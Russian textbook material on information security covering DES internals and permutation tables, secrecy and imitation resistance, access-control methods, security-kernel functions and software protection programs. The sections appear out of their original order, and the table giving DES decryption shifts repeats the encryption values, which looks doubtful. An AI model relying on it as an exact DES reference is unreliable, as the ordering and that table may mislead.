Чрезвычайно сложно решать задачу фильтрации с помощью активного фильтра из-за очень широкого динамического диапазона смеси речевого сигнала и помехи, поскольку потребуется достаточно высокое напряжения питания активного фильтра, а также увеличение потребляемого тока и, следовательно, придется увеличить габариты всего устройства.
Чем ниже частота помехи, тем большими габаритами должен обладать НЧ-фильтр, выполненный на пассивных RCL-элементах. При этом крутизна спада частотной характеристики должна быть достаточно высокой, что достигается только в фильтрах высокого порядка. Следовательно, габариты всего устройства резко возрастают. Кроме того, само по себе использование пассивного фильтра приводит к некоторому затуханию полезного сигнала.
Схема включения постановщика помех типа “Базальт” приведена на рис. 16.6.
Принцип работы блочного шифра
Рассмотрим принцип работы блочного шифра. Входом в блочный шифр и результатом его работы является блок длины n — последовательность, состоящая из n бит. Число n постоянно. При необходимости шифрования сообщения длиной, большей n, оно разбивается на блоки, каждый из которых шифруется отдельно. Различные режимы работы связаны с дополнительными усложнениями блочного шифра при переходах от блока к блоку. В стандарте DES длина блока n = 64.
В режиме ECB шифрование блока открытого текста В производится за 16 однотипных итераций, именуемых циклами. Схема преобразования приведена на рис. 18.7. Блок рассматривается как конкатенация (сцепление) двух подблоков равной длины: B = (L , R). На каждом цикле применяется свой ключ (Xi), обычно вырабатываемый из некоторого основного ключа (X). Ключи, используемые в циклах, называются подключами.
Основным элементом шифра является несекретная цикловая функция вида Y = f(R,X). Входом в цикл является выход из предыдущего цикла. Если упомянутый вход имеет вид (L, R), то выход имеет вид (R, L Å f(R, X)),
где Å — поразрядное сложение по модулю 2. Например, для выхода цикла с номером i
это означает: Ri = Li-1 Å f(Ri-1, Xi), Li = Ri-1 (i = 1,…,16).
В режиме ЕСВ алгоритм DES зашифровывает 64-битовый блок за 16 циклов. Биты входного блока перед первым циклом переставляются в соответствии с табл.18.1 в ходе так называемой начальной перестановки (IP — initial permutation). После выхода из последнего цикла L и R
переставляются местами, после чего соединяются в блок. Биты полученного блока снова переставляются в соответствии с перестановкой IP-1, обратной начальной. Результат принимается в качестве блока шифртекста.
Рис. 18.7.
Блок-схема работы алгоритма DES
Таблица 18.1.
Начальная перестановка IP
| 58 | 50 | 42 | 34 | 26 | 18 | 10 | 2 | ||||||||
| 60 | 52 | 44 | 36 | 28 | 20 | 12 | 4 | ||||||||
| 62 | 54 | 46 | 38 | 30 | 22 | 14 | 6 | ||||||||
| 64 | 56 | 48 | 40 | 32 | 24 | 16 | 8 | ||||||||
| 57 | 49 | 41 | 33 | 25 | 17 | 9 | 1 | ||||||||
| 59 | 51 | 43 | 35 | 27 | 19 | 11 | 3 | ||||||||
| 61 | 53 | 45 | 37 | 29 | 21 | 13 | 5 | ||||||||
| 63 | 55 | 47 | 39 | 31 | 23 | 15 | 7 |
Проблема имитостойкости
Теперь рассмотрим схему прохождения потока информации в криптографической системе, обеспечивающей имитостойкость (рис. 18.4).
Рис. 18.4.
Поток информации в криптографической системе,
обеспечивающей имитостойкость
При решении проблемы имитостойкости противник может не только видеть все криптограммы, передаваемые по каналу, но может также изменять их по своему желанию. Законный получатель защищает себя от обмана, дешифрируя все полученные сообщения и принимая только те сообщения, которые зашифрованы правильным ключом.
Любая попытка со стороны перехватчика расшифровать криптограмму С для получения открытого текста Р или зашифровать свой текст Р' для получения приемлемой криптограммы С' без получения ключа должно быть полностью исключено.
Если криптоанализ невозможен и криптоаналитик не может вывести Р и С или С' из Р' без предварительного получения ключа, то такая криптографическая система является криптостойкой.
Проблема секретности
Проблемы секретности и имитостойкости между собой тесно связаны, поэтому методы решения одной из них часто применимы для решения другой. Из двух названных проблем проблема секретности обычно рассматривается первой, как более старая и шире известная. Рассмотрим схему прохождения потока информации в криптографической системе, обеспечивающей секретность (рис. 18.3).
Рис. 18.3.
Поток информации в криптографической системе,
обеспечивающей секретность
Отправитель генерирует открытый текст, или шифрованное сообщение Р, которое должно быть передано получателю по незащищенному прослушиваемому каналу. Для того чтобы перехватчик не смог узнать содержания сообщения Р, отправитель шифрует или кодирует его с помощью обратимого преобразования Sk и получает криптограмму или шифрованный текст
С = Sk(P). Получатель, приняв сообщение С, дешифрирует или декодирует его с помощью обратного преобразования S и получает исходное сообщение
S (C) = S [Sk (P)] =P
Преобразование Sk
выбирается из семейства криптографических преобразований, называемых криптографической, или общей, системой.
Параметр, выбирающий отдельное используемое преобразование, называется ключом.
Общая система — это набор инструкций, аппаратурных средств и программного обеспечения ЭВМ, с помощью которого можно зашифровать и расшифровать текст разными способами, один из которых выбирается с помощью конкретного ключа.
Говоря более формально, криптографическая система — это однопараметрическое семейство (Sk)кÎK
обратимых преобразований Sk:Р®С из пространства Р сообщений открытого текста в пространство С шифрованных сообщений. Параметр, или ключ К, называется пространством ключей.
Обычно общая система рассматривается как общедоступная. С одной стороны, открытая для всех часть общей системы является предметом соглашения, а с другой стороны, это отражает очень важное правило техники защиты: защищенность системы не должна зависеть от секретности чего-либо такого, что нельзя быстро изменить в случае утечки секретной информации. Обычно общая система является некоторой совокупностью аппаратуры и программ, которую можно изменить только со значительной затратой времени и средств, тогда как ключ представляет собой легко изменяемый объект.
Поскольку вся секретность сосредоточена в секретности ключа, то его надо передавать отправителю и получателю по защищенному каналу распространения ключей, такому, как курьерская служба и т.д.
Проблемы регулирования использования ресурсов
Регулирование использования технических средств обычно осуществляется по таким параметрам, как общее право на доступ, время доступа и выполняемая функция.
Регулирование по общему праву на доступ заключается в том, что для каждого технического устройства с ограничениями на доступ составляется список субъектов и объектов, имеющих право доступа к нему. Тогда регулирование будет заключаться в разрешении доступа в том случае, когда обращающийся субъект или объект содержится в списке имеющих право доступа, и запрещения доступа в противном случае.
Регулирование доступа по времени состоит в том, что для всех субъектов или объектов может быть установлено не общее право доступа, а право доступа в определенное время (дни недели, число, часы). Аналогично, регулирование доступа по выполняемым функциям состоит в разрешении субъекту или объекту выполнять лишь строго определенные функции. На практике могут использоваться и комбинированные системы регулирования доступом.
Регулирование доступа к базам (массивам) данных получило широкое распространение при ЗИ в АС. Заметим, что данный вид регулирования доступа является одним из основных, который предусматривается в любой системе защиты.
В качестве элементарной (наименьшей) защищаемой единицы информации чаще всего принимается файл, что обусловлено двумя обстоятельствами: во-первых, именно файл чаще всего выступает единицей информационного обмена, и, во-вторых, на уровне файла проще всего решаются задачи регулирования доступа.
Все защищаемые файлы по признаку принадлежности обычно делят на общие, групповые и личные. К общим относятся файлы сервисных программ: операционные системы, библиотеки общего пользования и т.п. К общим файлам разрешается доступ всем пользователям, зарегистрированным в данной АС. Групповыми обычно являются файлы данных справочного характера (относящиеся к определенной сфере деятельности или принадлежащих какой-либо организации), библиотеки программ группового пользования и иные подобные файлы. Доступ к групповым файлам разрешается некоторой заранее определенной группе пользователей.
Личные файлы принадлежат одному пользователю, который их создает и имеет право доступа к ним. Другим лицам доступ может быть предоставлен только по разрешению владельца файла.
Информации, организованной в файлы и подлежащей защите, присваивается соответствующий гриф секретности. Порядок присвоения грифа секретности регламентируется законодательными актами.
К настоящему времени разработано несколько способов разграничения доступа:
разграничение по спискам;
матричное разграничение;
разграничение по уровням (кольцам) секретности;
страничная организация памяти;
мандатная система доступа.
Разграничение по спискам осуществляется в том случае, если права пользователей на доступ заданы в виде списков. При этом либо для каждого элемента базы задан список пользователей, имеющих право доступа к нему, либо для каждого пользователя задан перечень тех элементов базы, к которым ему разрешен доступ. В любом случае процедура разграничения реализуется в следующей последовательности.
1. По данным, содержащимся в запросе, выбирается соответствующая строка списка: перечень пользователей, допущенных к запрашиваемому элементу или перечень элементов баз данных, к которым допущен обратившийся с запросом пользователь.
2. В выбранной строке проверяется наличие имени пользователя, обратившегося с запросом, или имени элемента базы данных, к которому обращается пользователь.
3. По данным проверки принимается решение о допуске к запрашиваемым данным. Кроме того, могут предусматриваться санкции за попытку несанкционированного доступа, причем в качестве санкций могут быть приняты следующие меры: предупреждение пользователя о том, что им допущены несанкционированные действия; отключение пользователя от системы полностью или на некоторое время; подача сигнала контрольным органам о попытке несанкционированных действий.
Матричное разграничение является более гибким по сравнению с разграничением по спискам, поскольку оно позволяет не только регулировать доступ к данным, но и характер выполняемых процедур (чтение, запись, реконструирование данных и т.д.).
Обеспечивается это тем, что права пользователей задаются в виде матрицы, по строкам которой представлен список пользователей, а по столбцам — перечень имен элементов базы данных. Элементами матрицы являются коды, каждый из которых содержит информацию о полномочиях соответствующих пользователей относительно соответствующих элементов базы данных. Множество возможных прав определяется разрядностью кода.
Недостатками метода разграничения по матрице полномочий считаются два следующих обстоятельства: для больших систем с большим объемом защищаемых данных матрицы полномочий оказываются громоздкими, динамическое ведение матриц в процессе функционирования системы является достаточно сложной процедурой.
Разграничение доступа по уровням (кольцам) секретности заключается в том, что базы (массивы) защищаемых данных делятся на части в соответствии с уровнями их секретности. Полномочия каждого пользователя задаются максимальным уровнем секретности данных, доступ к которым ему разрешен. В соответствии с этим пользователю разрешается доступ ко всем данным, уровень секретности которых не выше уровня его полномочий. Нетрудно заметить, что такое разграничение является наименее гибким из всех рассмотренных.
Страничная организация памяти заключается в разделении объема ОП АС на блоки (страницы) фиксированного размера. При этом средствами операционной системы организуется управление использованием страниц программами пользователя. Любая попытка несанкционированного вхождения в поле страницы будет вызывать прерывание.
Мандатная система доступа или доступ по пропускам заключается в том, что пользователю выдается мандат (пропуск) на доступ к соответствующим массивам данных или сегментам памяти. При каждом обращении осуществляется проверка наличия мандата. Сама процедура разграничения является достаточно простой: предъявляемый мандат сравнивается с эталонным и по результатам сравнения принимается решение о допуске. Однако при этом возникают те же трудность, что и при работе с паролями — возможны перехват, разгадывание мандатов и т.п.
Основным средством разграничения доступа в больших банках данных является программный механизм замков управления доступом. Этот механизм позволяет объявить любой элемент базы закрытым и присвоить ему персональный замок. После этого доступ к данному элементу базы будет разрешен только в том случае, если в запросе будет представлен ключ именно к этому замку. Используемый язык описания данных позволяет закрыть замком любую структуру на всех иерархических уровнях. Сам замок может быть задан в виде постоянного кода, значениями переменной или результатом некоторой процедуры. Если замок задан константой или значением переменной, то для доступа к данным необходимо простое совпадение замка и предъявленного ключа. Если же замок задан процедурой, то доступ к данным будет разрешен только в случае получения вполне определенного результата процедуры.
Разграничение доступа с помощью механизма замков управления доступом считается весьма эффективным методом защиты данных. Однако одной этой защиты недостаточно. В современных автоматизированных банках данных, ориентированных на коллективное использование и долговременное хранение информации, механизм защиты должен быть развитым и многофункциональным. Такой механизм должен обладать следующими характеристиками.
1. Иметь средства опознавания терминалов и пользователей, причем система опознавания должна быть развитой и надежной.
2. Обеспечивать защиту по различным аспектам и на различных уровнях:
по компонентам банка данных, к которым относят компоненты структур данных, компоненты структур памяти, служебные данные, и т.д.;
по операциям разграничения доступа и выполнения программ и процедур, разграничения возможностей перемещения данных в оперативной памяти, контроля санкционированности реорганизации баз и т.п.;
по условиям выполнения операции в зависимости от содержания данных об объектах, в зависимости от входных данных, в зависимости от частоты обращений и т.п.
3. Обеспечивать разграничение по иерархической системе полномочий, когда пользователь обладает своими полномочиями и полномочиями всех пользователей, занимающих подчиненное положение.
4. Иметь возможность криптографического закрытия данных в базах.
5. Иметь развитую систему реагирования на попытки несанкционированного доступа (извещение пользователя, снятие задания, отключение терминала, исключение нарушителя из списка пользователей, подача сигнала тревоги).
6. Иметь средства спецификации правил защиты как с помощью языка описания данных, так и с помощью автономного языка.
Процедура формирования подключей
 Рис. 18.8. Формирование подключей |
На каждом цикле (рис. 18.8) из ключа X длиной 56 бит формируется ключ Xi размером 48 бит. Сам ключ X размещается в восьмибайтовом слове, причем восьмые разряды каждого байта являются контрольными и в ключ не входят. Перед шифрованием, в соответствии с процедурой выбора PC1 (табл. 18.2), из X выбираются 56 бит, которыми заполняются два регистра (C и D) длиной 28 бит каждый. В дальнейшем, при входе в очередной цикл с номером i, регистры сдвигаются циклически влево. Величина сдвига зависит от номера цикла, но является фиксированной и заранее известна. После сдвига оба подблока объединяются в порядке (C, D). Затем, в соответствии с функцией выбора PC2 (табл. 18.3), из них выбираются 48 бит подключа Xi. Шифрование и расшифровывание отличаются направлением сдвигов (табл. 18.4).
Таблица 18.2. Преобразование PC1
| Заполнение С | Заполнение D | ||||||||||||||||||||||||||
| 57 | 49 | 41 | 33 | 25 | 17 | 9 | 63 | 55 | 47 | 39 | 31 | 23 | 15 | ||||||||||||||
| 1 | 58 | 50 | 42 | 34 | 26 | 18 | 7 | 62 | 54 | 46 | 38 | 30 | 22 | ||||||||||||||
| 10 | 2 | 59 | 51 | 43 | 35 | 27 | 14 | 6 | 61 | 53 | 45 | 37 | 29 | ||||||||||||||
| 19 | 11 | 3 | 60 | 52 | 44 | 36 | 21 | 13 | 5 | 28 | 20 | 12 | 4 |
Таблица 18.3.
Преобразование PC2
| 14 | 17 | 11 | 24 | 1 | 5 | 3 | 28 | ||||||||
| 15 | 6 | 21 | 10 | 23 | 19 | 12 | 4 | ||||||||
| 26 | 8 | 16 | 7 | 27 | 20 | 13 | 2 | ||||||||
| 41 | 52 | 31 | 37 | 47 | 55 | 30 | 40 | ||||||||
| 51 | 45 | 33 | 48 | 44 | 49 | 39 | 56 | ||||||||
| 34 | 53 | 46 | 42 | 50 | 36 | 29 | 32 |
Выбор битов по таблицам 18.2–18.4 из соответствующих блоков производится следующим образом. Таблица рассматривается как последовательность ее строк, записанных друг за другом, начиная с первой строки. Биты блока данных соответствующей длины нумеруются слева направо, начиная с единицы. Каждый элемент s таблицы рассматривается, как номер бита bs в блоке данных. Преобразование заключается в замене всех элементов s на биты bs.
Таблица 18.4.
Соответствие сдвигов номерам циклов DES
|
Номер цикла |
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
|
Сдвиг влево (шифрование) |
1 |
1 |
2 |
2 |
2 |
2 |
2 |
2 |
1 |
2 |
2 |
2 |
2 |
2 |
2 |
1 |
|
Сдвиг вправо (расшифровывание) |
1 |
1 |
2 |
2 |
2 |
2 |
2 |
2 |
1 |
2 |
2 |
2 |
2 |
2 |
2 |
1 |
1. Расширение блока Ri-1
до 48 бит за счет повторения битов блока с помощью функции расширения EP (табл. 18.5).
2. Поразрядное сложение результата с ключом Xi.
3. Преобразование полученной суммы с помощью замены (используя так называемые S-блоки), в результате которого получается блок длиной 32 бит.
4. Применение перестановки P (табл. 18.6), что дает значение функции
Y = f(R,X).
Таблица 18.5.
Преобразование EP Таблица 18.6.
Перестановка P
|
32 |
1 |
2 |
3 |
4 |
5 |
16 |
7 |
20 |
21 |
29 |
12 |
28 |
17 |
|
|
4 |
5 |
6 |
7 |
8 |
9 |
1 |
15 |
23 |
26 |
5 |
18 |
31 |
10 |
|
|
8 |
9 |
10 |
11 |
12 |
13 |
2 |
8 |
24 |
14 |
32 |
27 |
3 |
9 |
|
|
12 |
13 |
14 |
15 |
16 |
17 |
19 |
13 |
30 |
6 |
22 |
11 |
4 |
25 |
|
|
16 |
17 |
18 |
19 |
20 |
21 |
|||||||||
|
20 |
21 |
22 |
23 |
24 |
25 |
|||||||||
|
24 |
25 |
26 |
27 |
28 |
29 |
|||||||||
|
28 |
29 |
30 |
31 |
32 |
1 |
Программные средства защиты информации
Программными СЗИ называются специальные программы, входящие в состав программного обеспечения АС для решения в них (самостоятельно или в комплекте с другими средствами) задач защиты. Программные СЗИ являются непременной и важнейшей частью механизма защиты современных АС. Такая их роль определяется следующими достоинствами: универсальностью, гибкостью, простой реализацией, надежностью, возможностью модификации и развития.
При этом под универсальностью понимается возможность решения программными СЗИ большого числа задач защиты.
Под надежностью понимается высокая программная устойчивость при большой продолжительности непрерывной работы и удовлетворение высоким требованиям и достоверности управляющих воздействий при наличии различных дестабилизирующих факторов. Программные возможности изменения и развития программных СЗИ определяются самой их природой.
Существенным недостатком программных СЗИ является возможность их реализации только в тех структурных элементах АС, где имеется процессор, хотя функции защиты могут реализовываться, осуществляя безопасность других структурных элементов. Помимо того, программным СЗИ присущи следующие недостатки:
необходимость использования времени работы процессора, что ведет к увеличению времени отклика на запросы и, как следствие, к уменьшению эффективности ее работы;
уменьшение объемов оперативной памяти (ОП) и памяти на внешних запоминающих устройствах (ПВЗУ), доступной для использования функциональными задачами;
возможность случайного или умышленного изменения, вследствие чего программы могут не только утратить способность выполнять функции защиты, но и стать дополнительными источниками угрозы безопасности;
ограниченность из-за жесткой ориентации на архитектуру определенных типов ЭВМ (даже в рамках одного класса) — зависимость программ от особенностей базовой системы ввода/вывода, таблицы векторов прерывания и т.п.
Для организационного построения программных СЗИ наиболее характерной является тенденция разработки комплексных программ, выполняющих целый ряд защитных функций, причем чаще всего в число этих функций входит опознавание пользователей, разграничение доступа к массивам данных, запрещение доступа к некоторым областям ОП и т.п.
Достоинства таких программ очевидны: каждая из них обеспечивает решение некоторого числа важных задач защиты. Но им присущи и существенные недостатки, предопределяющие необходимость критической оценки сложившейся практики разработки и использования программных средств защиты. Первый и главный недостаток состоит в стихийности развития программ защиты, что, с одной стороны, не дает гарантий полноты имеющихся средств, а с другой — не исключает дублирования одних и тех же задач защиты. Вторым существенным недостатком является жесткая фиксация в каждом из комплексов программ защитных функций. Наконец, можно выделить еще один большой недостаток — ориентация подавляющего большинства имеющихся программных средств на конкретную среду применения (тип ЭВМ и операционную среду).
Отсюда вытекают три принципиально важных требования к формированию программных СЗИ: функциональная полнота, гибкость и унифицированность использования.
Что касается первого требования, то, как нетрудно убедиться, приведенный выше перечень программных средств составлен именно с таким расчетом, чтобы возможно более полно охватить все классы задач защиты.
Удовлетворение остальным двум требованиям зависит от форм и способов представления программ защиты. Анализ показал, что наиболее полно требованиям гибкости и унифицированности удовлетворяет следующая совокупность принципов: сквозное модульное построение, полная структуризация, представление на машинно-независимом языке.
Принцип сквозного модульного построения заключается в том, что каждая из программ любого уровня (объема) должна представляться в виде системы возможных модулей, причем каждый модуль любого уровня должен быть полностью автономным и иметь стандартные вход и выход, обеспечивающие комплексирование с любыми другими модулями. Нетрудно видеть, что эти условия могут быть обеспечены, если программные комплексы будут разрабатываться по принципу “сверху вниз”, т.е. в соответствии с принципом полной структуризации.
Представление на машинно-независимом языке предопределяет, что представление программных модулей должно быть таким, чтобы их с минимальными усилиями можно было включить в состав программного обеспечения любой АС.
В настоящее время имеются алгоритмические языки высокого уровня, полностью соответствующие этим требованиям.
Общепринятой классификации программных СЗИ в настоящее время не существует. Однако при описании программ защиты обычно придерживаются деления их по функциональному признаку, т.е. по выполняемым функциям защиты. При этом по мере развития форм и способов использования вычислительной техники функции программной защиты расширяются.
С учетом названных принципов можно использовать классификацию, приведенную на рис. 17.1.
Рис. 17.1. Классификация программных СЗИ
При этом под внешней защитой понимается совокупность средств, методов и мероприятий, направленных на защиту территории, на которой расположены здания вычислительных центров, и помещений, в которых расположены их элементы. Понятие внутренней защиты охватывает совокупность средств, методов и мероприятий, направленных на ЗИ, обрабатываемой в АС. В состав ядра системы безопасности входят программы, обеспечивающие защиту самой СЗИ.
Программы ядра системы безопасности
Все средства, методы, мероприятия, используемые в АС для ЗИ, должны объединяться в единый механизм защиты. При этом вполне естественно возникает вопрос об организации управления этим механизмом. Для этого в АС выделяется специальный компонент, называемый ядром системы безопасности.
Комплекс ядра системы безопасности должен выполнять следующие функции:
загрузка программ защиты;
установка и контроль установки регистров границы зон памяти;
контроль своевременности и надежности, уничтожения остаточной информации, т.е. данных, содержащихся на полях ЗУ, после выполнения задания;
проверка условий разрешения доступа;
проверка распределения и использования паролей и кодов;
включение терминалов пользователей в число работающих и выключение их из этого числа после завершения работы или после обнаружения несанкционированной деятельности;
создание и ведение массивов данных и полномочий пользователей;
текущий контроль использования данных о полномочиях пользователей;
некоторые вспомогательные функции.
Основными функциями ядра системы безопасности являются контроль, регистрация, уничтожение и сигнализация.
Программы контроля
Основное назначение программы контроля состоит в контроле состояния основных компонентов механизма защиты, соблюдение правил использования защищаемых данных и соблюдение правил использования механизма защиты.
Контроль состояния компонентов механизма защиты заключается в проверке их исправности и способности выполнять свои функции. В простейшем случае программы контроля представляют собой обычные диагностические программы, с помощью которых проверяется работоспособность технических и программных средств защиты. В развитых вариантах для контроля разрабатывается специальный пакет программ.
Под регистрацией в современных системах обеспечения безопасности информации понимают совокупность средств и методов, используемых для регулярного сбора, фиксации, обработки выдачи сведений о всех запросах, содержащих обращение к защищаемым данным. Наиболее распространенной формой регистрации является программное ведение специальных регистрационных журналов. В регистрационном журнале рекомендуется фиксировать время поступления запроса, имя терминала, с которого поступил запрос, и т.п. события. Однако, если не принять специальных мер, то при систематическом сборе остаточной информации из журналов можно непосредственно получить защищаемую информацию, а считав пароли, можно замаскироваться под зарегистрированного пользователя и получить несанкционированный доступ к данным в соответствии с его полномочиями. Поэтому надежная ЗИ невозможна без принятия мер для своевременного уничтожения остаточной информации. Такое уничтожение может быть надежно осуществлено двух-, трехкратной записью в соответствующих областях памяти произвольной комбинацией нулей и единиц.
Под аварийным уничтожением информации понимают такое ее уничтожение, которое осуществляется по специальным командам в тех случаях, когда обнаруживается неотвратимая опасность несанкционированного доступа. Осуществляется оно программными средствами путем посылки в соответствующие области памяти комбинаций нулей и единиц.
Программы сигнализации предназначены, с одной стороны, для предупреждения пользователей о необходимости соблюдать предосторожности при работе с секретными данными, а, с другой, — для своевременного предупреждения специалистов службы безопасности, администрации и пользователей АС о несанкционированных действиях.
Первый вид сигнализации осуществляется путем автоматического формирования и присвоения специального признака (грифа секретности) всем выдаваемым на печать или устройство отображения документам, содержащим защищаемую информацию.
Второй вид сигнализации осуществляется путем формирования и выдачи (подачи) службе безопасности, администрации и пользователям АС специальных сигналов обнаружения попыток несанкционированных действий, следствием которых может быть несанкционированный доступ к защищаемой информации.
Глава 18
Криптографическая защита
До недавнего времени криптография представляла интерес главным образом для военных и дипломатов. Частные лица и коммерческие организации редко считали необходимым прибегать к шифрованию для защиты своей корреспонденции, а если и прибегали, то, как правило, без достаточной тщательности. Однако в силу целого ряда обстоятельств интерес к применению криптографии резко повысился.
В настоящее время количество областей, в которых средства электронной связи заменяют бумажную переписку, быстро увеличивается. В результате увеличивается и доступный для перехвата объем информации, а сам перехват становится более легким. Однако те же самые факторы, которые способствуют распространению электронных средств связи, заметно снижают также затраты на криптографию.
В случае передачи данных электронной почтой перехват оказывается даже еще более легким, чем в случае телефонной связи, поскольку при телефонной связи перехватчик не имеет возможности различать содержание сообщения, если только не используется человек-наблюдатель. При передаче данных материал находится в форме, пригодной для восприятия вычислительной машиной, и подобных ограничений не возникает.
Стоимость перехвата со временем все более уменьшается. В результате этого возрастает интерес к криптографии как у частных лиц, так и у коммерческих организаций. Особенную остроту проблема криптографической защиты приобрела с бурным развитием электронной почты и систем электронных платежей.
Программы внешней защиты
К таким программам относятся:
программы защиты территории и помещений;
программы управления доступом на территорию и в помещения;
программы защиты данных в каналах связи.
Более подробно остановимся на третьем классе программ. Обеспечение надежной защиты информации, предаваемой по каналам связи, проходящим по неконтролируемой территории, сопряжено с большими трудностями. Обусловлено это тем, что при современных возможностях перехвата вполне реальной является угроза регулярного несанкционированного получения информации из таких каналов связи. Считается, что единственным эффективным способом надежной ЗИ в каналах связи является криптографическое закрытие передаваемой информации. Однако организация регулярного криптографического закрытия больших потоков информации, интенсивно циркулирующих в каналах связи, сопряжена с большими трудностями и расходованием значительных ресурсов.
В тех случаях, когда применение криптографических средств является невозможным или нецелесообразным, рекомендуется использовать следующие программные методы защиты.
1. Опознавание корреспондентов.
2. Проверка уровня секретности канала связи.
3. Контроль по граничным адресам ОП.
4. Проверка адреса корреспондента.
5. Проверка обратного кода.
Опознавание корреспондентов состоит в том, что перед выдачей данных в канал связи АС запрашивает у корреспондента пароль или другую персональную и сохраняющуюся в тайне информацию, сравнивает эту информацию с хранящейся в ОП эталонной и выдает данные в канал лишь в случае совпадения предъявленной и эталонной информации. Как и любое другое опознавание, опознавание корреспондентов может быть простым и усложненным. Выбор способа опознавания определяется характером и степенью секретности предъявленных данных, а также условиями передачи (протяженность и вид канала связи, характер территории, по которой он проходит, и т.п.).
Особенностью опознавания корреспондентов является то, что информация, используемая в процессе опознавания, также должна передаваться по этому же каналу связи.
Создание особых каналов для передачи информации для опознавания практически нереально. Поэтому информация опознавания также может быть перехвачена злоумышленником. Для повышения надежности опознавания можно использовать криптографическое закрытие информации опознавания. Однако при этом возникают большие сложности, связанные с распределением и периодической сменой ключей, применяемых для шифрования и дешифрования этой информации.
Проверка уровня секретности канала связи является некоторым дополнительным средством защиты и заключается в том, что каждому каналу связи, используемому для передачи информации, присваивается некоторый максимальный уровень секретности, так что передача по этому каналу информации с более высоким уровнем секретности не допускается. Перед выдачей данных в канал АС проверяет соответствие уровня секретности подлежащих передаче данных и принимает соответствующее решение. Гриф секретности подготовленных к передаче данных определяется в этом случае по максимальному грифу секретности массива, использованного для формирования этих данных.
Контроль по граничным адресам ОП заключается в том, что для размещения массива передаваемых данных в ОП выделяется поле, начальный и конечный адрес которого размещается в регистрах или в специально выделенных зонах ОП. Перед выборкой для выдачи в канал каждого элемента данных производится проверка адреса выборки по граничным адресам. Если адрес выборки выходит за граничные адреса, выдача данных блокируется. Этим самым обеспечивается защита от случайной или преднамеренной выдачи в канал связи данных, находящихся на соседних полях ОП.
Проверка адреса корреспондента осуществляется следующим образом. При передаче большого объема информации имеется принципиальная возможность случайного или злоумышленного изменения адреса корреспондента, хранящегося в регистре или в специально выделенной зоне ОП. В этом случае данные (после изменения адреса) будут передаваться по адресу, модифицированному в результате изменений, или заданному злоумышленником.
С целью минимизации объема переданных по ложному адресу данных рекомендуется в процессе передачи периодически (через определенный интервал времени и после передачи определенного объема информации) проверить адрес корреспондента. Процедура проверки является обычной: адрес корреспондента, используемый для передачи, сравнивается с эталонным, хранящимся в безопасной зоне ОП. При несовпадении сравниваемых адресов передача данных блокируется и вырабатывается соответствующий системный сигнал.
Проверка обратного кода представляет собой процедуру защиты, осуществляемую в процессе передачи данных. Заключается она в том, что у корреспондента периодически запрашивается идентифицирующая информация, которая и называется обратным кодом. Эта информация сравнивается с эталонной, при несовпадении кодов передача блокируется. Проверкой обратного кода можно обнаружить факт изменения (перекоммутации) направления выдачи данных или умышленного несанкционированного использования приемного устройства зарегистрированного корреспондента.
Программы внутренней защиты
Этот класс программ осуществляет ЗИ непосредственно в элементах АС. Сущность такой защиты сводится к регулированию использования соответствующих ресурсов АС (технических средств, данных, программ) в строгом соответствии с полномочиями, предоставленными субъектам (пользователям) и объектам (терминалам, групповым устройствам, программам). Каждый из видов регулирования обычно осуществляется в следующей последовательности.
1. Установление подлинности (опознание) субъекта или объекта, обращающегося к ресурсам системы.
2. Определение соответствия характера и содержания запроса полномочиям, предъявленным запрашивающему субъекту или объекту.
3. Принятие и реализация решений в соответствии с результатами проверки полномочий.
Наиболее важной из перечисленных процедур является первая, т.е. установление подлинности (опознание) субъекта или объекта, обращающегося к ресурсам АС. Поэтому разработке эффективных средств надежного опознания неизменно уделяется повышенное внимание.
Установление подлинности (аутентификация, идентификация, опознавание) какого-либо объекта или субъекта заключается в подтверждении того, что обращавшийся субъект или предъявленный объект являются именно тем, который должен участвовать в данном процессе обработки информации. Основными субъектами, подлинность которых подлежит установлению во всех системах, где обрабатывается информация с ограниченным доступом, являются различные пользователи. В некоторых системах с повышенными требованиями к обеспечению безопасности предусматривается установление подлинности программистов, участвующих в разработке и эксплуатации программного обеспечения, администраторов банков данных и даже инженерно-технического персонала, привлеченного к техническому обслуживанию системы в процессе обработки защищаемой информации.
Сложность и объем операций по опознаванию могут существенно отличаться для каждого конкретного случая. Они определяются следующими основными факторами:
структурным и организационным построением АС (размеры, сложность архитектуры, территориальное распределение, развитость терминальной сети, характер размещения оборудования и т.п.);
характером функционирования ( наличие дистанционного доступа, режим работы АС, объем и характер обмена информацией по автоматизированным каналам связи и т.д.);
степенью секретности защищаемой информации и ее объемом.
В зависимости от сложности операций опознавания, специалисты выделяют три основные группы:
простое;
усложненное;
особое опознавание.
По величине объема операций процедуры опознавания также разбивают на три группы:
контрольное;
расширенное;
всеобщее опознавание.
Под контрольным опознаванием понимают опознавание удаленных терминалов в моменты включения их в работу и при обращении их к системе во время обработки защищаемой информации. При расширенном опознавании обычно производится опознавание программистов, удаленных корреспондентов, устройств группового управления вводом/выводом, элементов защищаемых баз данных и т.д. При всеобщем опознавании обеспечивается опознавание всех субъектов и объектов, имеющих отношение к обработке защищаемой информации.
Простое опознавание, как правило, сводится к сравнению кода (пароля), предъявляемого терминалом или пользователем, с эталонным кодом (паролем), хранящимся в ОП АС. При усложненном опознавании обычно используется дополнительная информация — система разовых паролей, персональная информация пользователя и т.п. Усложненное опознавание осуществляется в режиме диалога: система формирует вопросы, на которые опознаваемый должен дать ответы. По содержанию ответов система принимает решение об опознавании. При особом распознавании используется такая совокупность опознавательных характеристик, при которой должно обеспечиваться надежное опознавание субъектов и объектов.
Существует также понятие прямого и обратного опознавания. При этом под прямым опознаванием понимают опознавание системой обращающихся к ней субъектов и используемых объектов, а под обратным — опознавание пользователем элементов системы, предоставляемых ему для обработки защищаемых данных.
Программы защиты программ
Необходимость защиты программ обусловлена тем, что они могут служить каналом несанкционированного доступа к информации. Возможности использования программ для несанкционированного доступа к информации могут быть следствием как несовершенства программ, так и умышленных их изменений.
Несовершенство программ может быть следствием нечеткости определения функций разрабатываемых программ, недостаточной квалификации программистов, несовершенства средств и технологии программирования, отладки и тестирования.
В соответствии с этим необходимо использовать следующие меры по защите программ:
точное и однозначное определение для каждой разрабатываемой программы перечня санкционированных функций;
использование средств и технологии программирования, минимизирующих вероятность наличия дополнительных функциональных возможностей, которые могут быть использованы для несанкционированных действий;
предупреждение внесения несанкционированных изменений в программе как в процессе их разработки, так и на этапе эксплуатации;
предупреждение несанкционированного использования программ в процессе функционирования системы.
